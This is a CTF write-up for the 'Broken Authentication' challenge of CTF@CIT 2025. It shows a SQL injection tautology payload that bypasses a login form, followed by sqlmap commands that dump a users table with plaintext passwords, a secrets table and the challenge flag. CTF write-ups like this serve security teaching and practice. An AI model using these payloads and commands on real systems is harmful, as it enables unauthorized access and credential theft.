Skip to content

SQL Injection Auth Bypass and Database Dump – CTF@CIT 2025: Broken Authentication

TL;DR

  • Login form is vulnerable to classic SQL injection.
  • Authentication is bypassed with a tautology payload.
  • SQL injection allows full database enumeration.
  • Flag is stored in a separate secrets table and dumped directly.

Video Walkthrough

SQL injection authentication bypass and database enumeration – CTF@CIT 2025 Broken Authentication

Description

Say my username.

Solution

Part 1: SQL Injection (Auth Bypass)

Basic login page. When we submit the username as '' it returns the following error.

Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1 in /var/www/html/index.php:23
Stack trace:
#0 /var/www/html/index.php(23): mysqli->query('SELECT * FROM u...')
#1 {main}
  thrown in <b>/var/www/html/index.php

Submit username and password as ' or '1'='1 and bypass the login panel.

Part 2: SQLi (DB Enumeration)

The admin panel says As you can probably tell, this page is currently under construction.

Checked the source, cookies, technologies etc but doesn't appear to be anything of use. Perhaps the flag is in the username/password and we need to return to the SQLi.

sqlmap -u http://23.179.17.40:58001/index.php --data "username=cat&password=meow&login=Login" --batch

It finds the SQLi, so we dump the creds:

sqlmap -u http://23.179.17.40:58001/index.php --data "username=cat&password=meow&login=Login" --batch -T users --dump

+---------+----------+--------------+----------+
| email   | fullname | password     | username |
+---------+----------+--------------+----------+
| <blank> | <blank>  | m1n3r41s     | hank     |
| <blank> | <blank>  | 9f3IC3uj9^zZ | admin    |
| <blank> | <blank>  | M4GN375      | jesse    |
| <blank> | <blank>  | b4byb1u3     | walter   |
+---------+----------+--------------+----------+

Tried to login with each account in case the admin UI changed, but it did not.

Let's see if there's any other tables.

sqlmap -u http://23.179.17.40:58001/index.php --data "username=cat&password=meow&login=Login" --batch -D app --tables

+---------+
| secrets |
| users   |
+---------+

Nice! secrets sounds pretty promising 👀

sqlmap -u http://23.179.17.40:58001/index.php --data "username=cat&password=meow&login=Login" --batch -T secrets --dump

+--------+-----------------------+
| name   | value                 |
+--------+-----------------------+
| flag   | CIT{36b0efd6c2ec7132} |
+--------+-----------------------+

Flag: CIT{36b0efd6c2ec7132}